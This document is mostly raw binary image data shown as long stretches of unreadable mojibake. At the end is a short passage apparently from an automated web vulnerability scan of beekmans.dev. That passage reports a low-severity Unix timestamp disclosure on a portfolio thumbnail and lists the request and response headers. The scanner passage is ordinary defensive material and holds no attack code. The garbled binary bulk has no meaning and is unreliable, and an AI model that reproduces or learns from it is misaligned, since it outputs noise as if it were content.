          £¼«§*‘v@#¢®‘´ç,"”Œ†–¯‚ùç‘M‘›yÙ¢ÿã$CýՐªþ#³áK44« Ç[û‰úM×½û¯uï~ëÝ{ߺ÷^÷î½×½û¯uï~ëÝ{ߺ÷^÷î½×½û¯uï~ëÝ{ߺ÷^÷î½×½û¯uï~ëÝ{ߺ÷A?y̨Þö¯¦ÿݕ³ÞZÿ’îÝþœÿÇOH÷÷°„uVÞæ¾‚}{ߺ÷^÷î½×½û¯uÿ×Ù_ÞDtëÞý׺÷¿uî½ïÝ{£‰ñþ.;ãþ °_õ¿)î?çÏìvßôÏþèëfø®>Áþ^Žï¸ß£î½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¢Yó»ân;å¿Hä6…1£¡ì=±4ۗ¬³•vŽ*]Ã;EQ„¯¨U2E„ÜôƒíªºÅ(† «šuB3änk“”÷¨îÚ­·Ê4L£Í+†øäzKQ¨ž“ÜÀ'Œ¯ã?ÕóëLÛµ÷ÉÜy­£»põûsm̕^9„ÉÀÔÕøÜ•¦šZ˜[èñȼJ²Ù”• œÆ¶º·½·†îÒe’ÚE¬¦ ‚0GDD%XPŽ’’ÄÿÅ}»Õ‡öuO©ÿ[þ#Û~_Ó¨r}ØÅ}Ðð=_¨/ÿ÷¦êã‰êŸŸõÿâ¾èzºñ꟟õýÓ«¯¡?üGºzuuêý?Ûû©êãêý=ÐõqçÔ9>þÃþ#Ýz¸áÔ9??ë{¡ãùõqèOôï¿§ºtààz‚ÿAþ¿ºõo>¡Éùÿ}ù÷CӟÃÔ)??ëÄ{¡êÿÃÔ9=Ôùõo>¡Éùÿ}ùöÙâ:¿˜û:…'Ôÿ­ÿ\qêýß_to‡«>¢kxÝ$Ú9#pèèÅ]Hete!••…ÁƒîÀðêã‰ëm?åüàcì¶þ-|®ÜÑÿPR`z›·³•B8÷Ði±Û+}djBoki‹’‘€ÌqçïôI]óÇ"ý/¼ì°ÿ‹|RD?« þâ_ÃÄváRM*è1æ:ÙgÜKÒN½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^è'ï/ù•ÏþÕôßû²¡ö{Ë_ò]ۿӟøééáþáÏöðŽªÛÜ×ÐO¯{÷^ëÞý׺÷¿uî¿ÿÐÙ_ÞDtëÞý׺÷¿uî½ïÝ{£{ñ2¦š›!½ÍMDáèðALòÇb'Ê\)‘–ä_ñìÏHïÛ¡	î~¾KÑÖÌ@ióä?ËÑÕþ+ŒÿþvSÿ×Ïqρ?ûåÿaèö£×¯ÆÎƃÿ;)ÿëç¿xÿ¾_ö½Që׿Šã?çcAÿ”ÿõóß¼	ÿß/û^¨õ뱔Æa‘¡$ð«§¹?õ3ß¼	¿ß-û^¨õë'ÞÑÊÝ/þtEÿGû¯‡'ûí¿aëÕ½{ïh¿ån—ÿ:"ÿ£ýûÓýöß°õê^½÷´_ò·KÿÑþýáÉþûoØzõG¯^ûÚ/ù[¥ÿΈ¿èÿ~ðäÿ}·ì=z£×¯}íü­ÒÿçD_ô¿xr¾Ûö½Që×¾ö‹þVéó¢/ú?ß¼9?ßmû^¨õëß{Eÿ+t¿ùÑýïÞŸï¶ý‡¯Tzõï½¢ÿ•º_üè‹þ÷ïO÷Û~Ãת=z÷ÞÑÊÝ/þtEÿGû÷‡'ûí¿aëÕ½{ïh¿ån—ÿ:"ÿ£ýûÓýöß°õê^½÷´_ò·KÿÑþýáÉþûoØzõG¯^ûÚ/ù[¥ÿΈ¿èÿ~ðäÿ}·ì=z£×¯}íü­ÒÿçD_ô¿xr¾Ûö½Që×¾ö‹þVéó¢/ú?ß¼9?ßmû^¨õëß{Eÿ+t¿ùÑýïÞŸï¶ý‡¯Tzõï½¢ÿ•º_üè‹þ÷ïO÷Û~Ãת=z÷ÞÑÊÝ/þtEÿGû÷‡'ûí¿aëÕ½{ïh¿ån—ÿ:"ÿ£ýûÓýöß°õê^½÷´_ò·KÿÑþýáÉþûoØzõG¯^ûÚ/ù[¥ÿΈ¿èÿ~ðäÿ}·ì=z£×¯}íü­ÒÿçD_ô¿xr¾Ûö½Që×¾ö‹þVéó¢/ú?ß¼9?ßmû^¨õëß{Eÿ+t¿ùÑýïÞŸï¶ý‡¯Tzõï½¢ÿ•º_üè‹þ÷ïO÷Û~Ãת=z÷ÞÑÊÝ/þtEÿGû÷‡'ûí¿aëÕ½{ïh¿ån—ÿ:"ÿ£ýûÓýöß°õê^½÷´_ò·KÿÑþýáÉþûoØzõG¯^ûÚ/ù[¥ÿΈ¿èÿ~ðäÿ}·ì=z£×¯}íü­ÒÿçD_ô¿xr¾Ûö½Që×¾ö‹þVéó¢/ú?ß¼9?ßmû^¨õëß{Eÿ+t¿ùÑýïÞŸï¶ý‡¯Tzõï½¢ÿ•º_üè‹þ÷ïO÷Û~Ãת=z÷ÞÑÊÝ/þtEÿGû÷‡'ûí¿aëÕ½{ïh¿ån—ÿ:"ÿ£ýûÓýöß°õê^½÷´_ò·KÿÑþýáÉþûoØzõG¯^ûÚ/ù[¥ÿΈ¿èÿ~ðäÿ}·ì=z£×¯}íü­ÒÿçD_ô¿xr¾Ûö½Që×¾ö‹þVéó¢/ú?ß¼9?ßmû^¨õëß{Eÿ+t¿ùÑýïÞŸï¶ý‡¯Tzõï½¢ÿ•º_üè‹þ÷ïO÷Û~Ãת=z÷ÞÑÊÝ/þtEÿGû÷‡'ûí¿aëÕ½{ïh¿ån—ÿ:"ÿ£ýûÓýöß°õê^½÷´_ò·KÿÑþýáÉþûoØzõG¯^ûÚ/ù[¥ÿΈ¿èÿ~ðäÿ}·ì=z£×¯}íü­ÒÿçD_ô¿xr¾Ûö½Që×¾ö‹þVéó¢/ú?ß¼9?ßmû^¨õëß{Eÿ+t¿ùÑýïÞŸï¶ý‡¯Tzõï½¢ÿ•º_üè‹þ÷ïO÷Û~Ãת=z÷ÞÑÊÝ/þtEÿGû÷‡'ûí¿aëÕ½{ïh¿ån—ÿ:"ÿ£ýûÓýöß°õê^½÷´_ò·KÿÑþýáÉþûoØzõG¯^ûÚ/ù[¥ÿΈ¿èÿ~ðäÿ}·ì=z£×¯}íü­ÒÿçD_ô¿xr¾Ûö½Që×¾ö‹þVéó¢/ú?ß¼9?ßmû^¨õëß{Eÿ+t¿ùÑýïÞŸï¶ý‡¯Tzõï½¢ÿ•º_üè‹þ÷ïO÷Û~Ãת=z÷ÞÑÊÝ/þtEÿGû÷‡'ûí¿aëÕ½{ïh¿ån—ÿ:"ÿ£ýûÓýöß°õê^½÷´_ò·KÿÑþýáÉþûoØzõG¯^ûÚ/ù[¥ÿΈ¿èÿ~ðäÿ}·ì=z£×¯}íü­ÒÿçD_ô¿xr¾Ûö½Që×¾ö‹þVéó¢/ú?ß¼9?ßmû^¨õëß{Eÿ+t¿ùÑýïÞŸï¶ý‡¯Tzõï½¢ÿ•º_üè‹þ÷ïO÷Û~Ãת=z÷ÞÑÊÝ/þtEÿGû÷‡'ûí¿aëÕ½{ïh¿ån—ÿ:"ÿ£ýûÓýöß°õê^½÷´_ò·KÿÑþýáÉþûoØzõG¯^ûÚ/ù[¥ÿΈ¿èÿ~ðäÿ}·ì=z£×¯}íü­ÒÿçD_ô¿xr¾Ûö½Që×¾ö‹þVéó¢/ú?ß¼9?ßmû^¨õëß{Eÿ+t¿ùÑýïÞŸï¶ý‡¯Tzõï½¢ÿ•º_üè‹þ÷ïO÷Û~Ãת=z÷ÞÑÊÝ/þtEÿGû÷‡'ûí¿aëÕ½{ïh¿ån—ÿ:"ÿ£ýûÓýöß°õê^½÷´_ò·KÿÑþýáÉþûoØzõG¯^ûÚ/ù[¥ÿΈ¿èÿ~ðäÿ}·ì=z£×¯}íü­ÒÿçD_ô¿xr¾Ûö½Që×¾ö‹þVéó¢/ú?ß¼9?ßmû^¨õëß{Eÿ+t¿ùÑýïÞŸï¶ý‡¯Tzõï½¢ÿ•º_üè‹þ÷ïO÷Û~Ãת=z÷ÞÑÊÝ/þtEÿGû÷‡'ûí¿aëÕ½{ïh¿ån—ÿ:"ÿ£ýûÓýöß°õê^½÷´_ò·KÿÑþýáÉþûoØzõG¯^ûÚ/ù[¥ÿΈ¿èÿ~ðäÿ}·ì=z£×¯}íü­ÒÿçD_ô¿xr¾Ûö½Që×¾ö‹þVéó¢/ú?ß¼9?ßmû^¨õëß{Eÿ+t¿ùÑýïÞŸï¶ý‡¯Tzõï½¢ÿ•º_üè‹þ÷ïO÷Û~Ãת=z÷ÞÑÊÝ/þtEÿGû÷‡'ûí¿aëÕ½{ïh¿ån—ÿ:"ÿ£ýûÓýöß°õê^½÷´_ò·KÿÑþýáÉþûoØzõG¯^ûÚ/ù[¥ÿΈ¿èÿ~ðäÿ}·ì=z£×¯}íü­ÒÿçD_ô¿xr¾Ûö½Që×¾ö‹þVéó¢/ú?ß¼9?ßmû^¨õëß{Eÿ+t¿ùÑýïÞŸï¶ý‡¯Tzõï½¢ÿ•º_üè‹þ÷ïO÷Û~Ãת=z÷ÞÑÊÝ/þtEÿGû÷‡'ûí¿aëÕ½{ïh¿ån—ÿ:"ÿ£ýûÓýöß°õê^½÷´_ò·KÿÑþýáÉþûoØzõG¯UüÁ¿—þÍù_€Ÿ}lyð»g¾ðíÌ»ÍOKŒß´q·Û®E!R©BPdX¦â)uA§Å%r>^ò´ëcz’I±HÙZb'‹§Ë͓ψîâ’æÝ&”'ø~Þµ&ÞOrl]˛ÙûÃ_·w>ÜÈÔbóx\œž·]LÅe†d7VR,ÈêZ9cetfFåM­Õ½í´7v“,–Ò(eaAÿVGpsÑI[I$¤úŸõ¿â=¹éÕ½:‡'×ý‡üWÝÕú‚ÿñ_zn®8ž¡Iùÿ_þ+¯¡Éùÿ_Ý:ºñêÿÄ{§§W^¡?Óý¿ºž®8 ¿ÓÝW}C“èßì?â=׫ŽC“óþ·º?ŸW:„ÿAþûú{§N¨/ôëû¯Vó꟟÷ߟt=9ü=B“óþ·üGº¯ü=C“ÝOŸVó꟟÷ߟmž#«ù³¨R}OúßñëéÕÇ¡?×ý÷õ÷Føz¸óêÿÅ}ÐùõqÄõ
          ٕµ)*Êڕ”ÊÀÜG ƒî§«>¶ÃþQ?Î!7W÷kâ¿Ë]Ò©º‡Ùàz‹¹sõJ‘îp)±»°²•777-3['u‚¥¾óDµp§<r7‚eÞ6HG&H”|>®ƒø|ÙGÃÄváQÏoAâ ûGùzÙ·ïh¿ån—ÿ:"ÿ£ýľŸï¶ý‡¤5½{ïh¿ån—ÿ:"ÿ£ýûÓýöß°õê^½÷´_ò·KÿÑþýáÉþûoØzõG¯^ûÚ/ù[¥ÿΈ¿èÿ~ðäÿ}·ì=z£×¯}íü­ÒÿçD_ô¿xr¾Ûö½Që×¾ö‹þVéó¢/ú?ß¼9?ßmû^¨õëß{Eÿ+t¿ùÑýïÞŸï¶ý‡¯Tzõï½¢ÿ•º_üè‹þ÷ïO÷Û~Ãת=z÷ÞÑÊÝ/þtEÿGû÷‡'ûí¿aëÕ½{ïh¿ån—ÿ:"ÿ£ýûÓýöß°õê^¸>OL….ÕÀ¤êqþG¯j_Q×âØ¯ùÙãÿó¶›þ¾{ßÓÏþøØÍ×µ/ñ½ü[ÿ;<þvÓ×Ï~úyÿßûùºö¥þ!׿‹b¿çgÿÎÚoúùïßO?ûáÿaÿ7^Ô¿Ä:
          û·#Ÿª÷”P×QÍ+ãéôÇTHÖÈÑ1҈協ÇãÙß-Ã2ï{{4LYâðž‘ߐlç¡øGU…îgè)×½û¯uï~ëÝ{ߺ÷_ÿÑÙ_ÞDtëÞý׺÷¿uî½ïÝ{¡W«ÿÏæ?å•ýSì›wø`ûOù:4Û>)¾Áþ^…ÿduï~ëÝ{ߺ÷P2¿ñkÉÔgþãÉíȵ‹ý0ÿMÍý”¿éOø:+^Æz÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^è¦üœø½‚ïL;eñ"—Ù8ªR˜ŒÓ/Ž›1Aš<&|ƌòR±$AQf’•Àd,Œ²o’írxrU¬˜å}?¤¿?Qçöç§¢”ÆsðõDÛ£mgv~w)¶·6.¯
          ÃÔ½&G[ŽzyBRXeƒÇ"ŽXÙ]•2|3EqsBá¢aPGú¿âº1R)%äúÿ°ÿŠûÙàzs¨/ÿ÷¦êã‰êŸŸõÿâ¾èzºñ꟟õýÓ«¯¡?üGºzuuêý?Ûû©êãêý=ÐõqçÔ9>þÃþ#Ýz¸áÔ9??ë{¡ãùõqèOôï¿§ºtààz‚ÿAþ¿ºõo>¡Éùÿ}ù÷CӟÃÔ)??ëÄ{¡êÿÃÔ9=Ôùõo>¡Éùÿ}ùöÙâ:¿˜û:…'Ôÿ­ÿ\qêýß_to‡«>¡?üWÝŸWOP¤üÿ®â}ÔõqçÔ)8¹oøu<GW^^ïò÷þb_~p}
          ßÙÂrÁŠëÞÉËÔßïÉÓ
          ÕÞÓµþü›GC‘¿ÓçË¢IC»ŽÝJÜ[®<Àÿÿ(è+»ìÔwf˜âÊ?¿å˜êò½‘ôëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^èlë/ø³×ÚÉ¿÷›Ùíý¼é?Êz9Û²“ý7ùBG²®Œz÷¿uî½ïÝ{¤Îñÿg-ÿ,#ÿ܈}«±ÿràûÉÒkÏ÷_³ü£¢ãìSÐ{¯{÷^ëÞý׺÷¿uî¿ÿÒÙ_ÞDtëÞý׺÷¿uî½ïÝ{¡W«ÿÏæ?å•ýSì›wø`ûOù:4Û>)¾Áþ^…ÿduï~ëÝ{ߺ÷P2¿ñkÉÔgþãÉíȵ‹ý0ÿMÍý”¿éOø:+^Æz÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺+_%þ2mÎúÀšºoµÂv&•Ó¸Ìeb«uH¸Lÿ‰ZœTÎOŽ@ZI¼a”ɇ›6õ6×.“V´cܾŸÒ_CüŸ‘E1Œú¯T)¼vŽã؛)µ7f*§žÃÎi«è*”FýQˈZšZ˜˜IѳG,l©ܝðÝB“Àá¢aPGú°}G—FŠÁ€e8éÿñ_n7N'¨R~×ÿŠû¡êëǨr~×÷N®¼z„ÿñééÕרOôÿoî§«Ž¨/ô÷CÕǟPäú7ûøuêã‡Päüÿ­î‡çÕÇ¡?оþžéӃêýúþëÕ¼ú‡'çý÷çÝNP¤üÿ­ÿÿPä÷SçÕ¼ú‡'çý÷çÛgˆêþcìêŸSþ·üGºúuqǨOõÿ}ý}Ѿ®<ú„ÿñ_t>}\q=B“óþ¹ÿ‰÷SÕǟP¤üÿ¾þžêxŽ®¼:†ÿñÛôêãêô¿—§ó	ü¡~@çB X1=yÙyz›¶˜hv¦ñ®¨ki¶˜èr27˜g?¦Od[†ßÆ{uûGùGùGA]çe®»Ë4ù²ð¯ùGæ:¾d]º÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^èlë/ø³×ÚÉ¿÷›Ùíý¼é?Êz9Û²“ý7ùBG²®Œz÷¿uî½ïÝ{¤Îñÿg-ÿ,#ÿ܈}«±ÿràûÉÒkÏ÷_³ü£¢ãìSÐ{¯{÷^ëÞý׺÷¿uî¿ÿÓÙ_ÞDtëÞý׺÷¿uî½ïÝ{¡W«ÿÏæ?å•ýSì›wø`ûOù:4Û>)¾Áþ^…ÿduï~ëÝ{ߺ÷P2¿ñkÉÔgþãÉíȵ‹ý0ÿMÍý”¿éOø:+^Æz÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî‹?ɍ[_¿¶í¤ðawÞ"šUÛ;¤DI^^Q‡ÌˆÁ’³	S3k4”ÎÆH¾²G)ÆÑ¼MµËе³åÿ(ô?áà|ˆzŒGú'T¾ö6èëÏ“ÙûÇQ‡Îâf1TÒÎ.’ÆMଣoe\~¸fŒ”‘
          Á÷'As
          Ü	qná¢aÇü‡Ð1Ñ´l®5)Áé'çýø¯·ON¯¡Éùÿ_Ý:ºñêÿÄ{§§W^¡?Óý¿ºž®8 ¿ÓÝW}C“èßì?â=׫ŽC“óþ·º?ŸW:„ÿAþûú{§N¨/ôëû¯Vó꟟÷ߟt=9ü=B“óþ·üGº¯ü=C“ÝOŸVó꟟÷ߟmž#«ù³¨R}OúßñëéÕÇ¡?×ý÷õ÷Føz¸óêÿÅ}ÐùõqÄõ
          OÏúçþ'ÝOW}B“óþûú{©â:ºðêÿÄ{oӫލ/ôï¿§½uqÀõy?ËÇù8N…ùžÿqŸä؎ºì¬´üã¹Zz©¼k¦oø·~˜è²2Ÿò~"¼Z$ˆŠþº¦sæ?Ê?ÍÐWyÙ5¼³Nî,£Ïæ>~£öu~ÿ^G ý²>ýwïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^èlë/ø³×ÚÉ¿÷›Ùíý¼é?Êz9Û²“ý7ùBG²®Œz÷¿uî½ïÝ{¤Îñÿg-ÿ,#ÿ܈}«±ÿràûÉÒkÏ÷_³ü£¢ãìSÐ{¯{÷^ëÞý׺÷¿uî¿ÿÔÙ_ÞDtëÞý׺÷¿uî½ïÝ{¡W«ÿÏæ?å•ýSì›wø`ûOù:4Û>)¾Áþ^…ÿduï~ëÝ{ߺ÷P2¿ñkÉÔgþãÉíȵ‹ý0ÿMÍý”¿éOø:+^Æz÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¢éò+ã–Òù¶
          @EˆÞ¨e;[vEzš	[SÿÈÓ%vªSû“xØù#*÷ÔkµnÓí“jNèâ__˜ô#×ò==ÍT|>c­|»¯7oVÌÞ¸©qY¼d¾¤k½-u$…þÛ'Œª
          #­ÆÖ"–ŽUúØ«ueY:ÚêÈâÝõFGì>`úéÑÌN²ÊqÐ{'çýnôêñêÿÄ{§§W^¡?Óý¿ºž®8 ¿ÓÝW}C“èßì?â=׫ŽC“óþ·º?ŸW:„ÿAþûú{§N¨/ôëû¯Vó꟟÷ߟt=9ü=B“óþ·üGº¯ü=C“ÝOŸVó꟟÷ߟmž#«ù³¨R}OúßñëéÕÇ¡?×ý÷õ÷Føz¸óêÿÅ}ÐùõqÄõ
          OÏúçþ'ÝOW}B“óþûú{©â:ºðêÿÄ{oӫލ/ôï¿§½uqÀõO¡ÿ_ÛgÏ«Ž]ïòîþc§n6¡>AgYöó56'¯;'-Qs·®
          -­»ë§k¶úc¢¯“CqÇí´=1-õ†­S@½Þc׿>/?·ˆWzØü@זIßŔyü×çê<ü³Ç`ðCÊAR‚ ‚8 d:ïߺ÷^÷î½×½û¯uï~ëÝ{ߺ÷CgYŞ»þÖMÿ¸´ÞÈ7oíãÿIþSÑÎÛý”Ÿé¿È:=•tc×½û¯uï~ëÝ&wü{9oùaþäCí]û—ÛþN“^¸ÒýŸåbžƒÝ{ߺ÷^÷î½×½û¯uÿÕÙ_ÞDtëÞý׺÷¿uî½ïÝ{¡W«ÿÏæ?å•ýSì›wø`ûOù:4Û>)¾Áþ^…ÿduï~ëÝ{ߺ÷P2¿ñkÉÔgþãÉíȵ‹ý0ÿMÍý”¿éOø:+^Æz÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^è•üÑÄ|{ÎlÜv7¹weÉÜSšÃ°÷$8¼¦k;¬êIÅà¨rÍ»3*%ZH‰bº]&ñ°?ØsŽw{L‘
          kZ€ûI7§ŸÊ•éU©˜91-W̫ϪÉSÃI[[KO]M“§§©š2TI[%|QHÉe,yJ„pT(‚x!”)‘ZàI
          K*’¤äiQòÁ#öÑÒùc¦‡ÿˆ÷_N®½B§ûu=\p=A§º®<ú‡'Ñ¿ØÄ{¯W:‡'çýot<>®8u	þƒý÷ô÷NœP_è?×÷^­çÔ9??ï¿>èzsøz…'çýoøt=_øz‡'ºŸ>­çÔ9??ï¿>Û<GWógP¤úŸõ¿â=×Ó«Ž=B¯ûïëîðõqçÔ'ÿŠû¡óêã‰êŸŸõÏüOºž®<ú…'çý÷ô÷SÄuuáÔ7ÿˆöß§WP_è?ßOzêãêŸCþ¿¶ÏŸW:…/çý‡üGºõqÀu³wòÊÝ_.évÙÚ½ÃÖü—Mä0ß{Ö£•ÜRŸ;ÄDö8LÞÛÉn(7–CjÖCþR´/4´j¢J'ŠJ`öà¶ÅÙ¢xµÈ¡ÏçJW×üü@{ô{ašI-nº½4'Ô4×ÔWùÖ¶Ùì· ß^÷î½×½û¯uï~ëÝ{ߺ÷CgYŞ»þÖMÿ¸´ÞÈ7oíãÿIþSÑÎÛý”Ÿé¿È:=•tc×½û¯uï~ëÝ&wü{9oùaþäCí]û—ÛþN“^¸ÒýŸåbžƒÝ{ߺ÷^÷î½×½û¯uÿÙ
          Evidence
          141194698
          Solution

          Manually confirm that the timestamp data is not sensitive, and that the data cannot be aggregated to disclose exploitable patterns.

        34. GET https://beekmans.dev/img/portfolio/minor/blue/39-thumbnail.jpg
          Alert tags
          Alert description

          A timestamp was disclosed by the application/web server - Unix

          Other info

          145150258, which evaluates to: 1974-08-08 00:30:58

          Request
          Request line and header section (266 bytes)
          GET https://beekmans.dev/img/portfolio/minor/blue/39-thumbnail.jpg HTTP/1.1
          Host: beekmans.dev
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: https://beekmans.dev/
          
          
          Request body (0 bytes)
          Response
          Status line and header section (1162 bytes)
          HTTP/1.1 200 OK
          Date: Mon, 06 Dec 2021 09:56:07 GMT
          Content-Type: image/jpeg
          Content-Length: 206479
          Connection: keep-alive
          last-modified: Tue, 02 Nov 2021 10:18:04 GMT
          etag: "3268f-5cfcb9bec2340"
          content-security-policy: default-src 'self' http: https: data: blob: 'unsafe-inline'
          x-frame-options: SAMEORIGIN
          x-xss-protection: 1; mode=block
          x-content-type-options: nosniff
          referrer-policy: no-referrer-when-downgrade
          strict-transport-security: max-age=31536000; includeSubDomains; preload
          Cache-Control: max-age=14400
          CF-Cache-Status: HIT
          Age: 2419
          Accept-Ranges: bytes
          Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
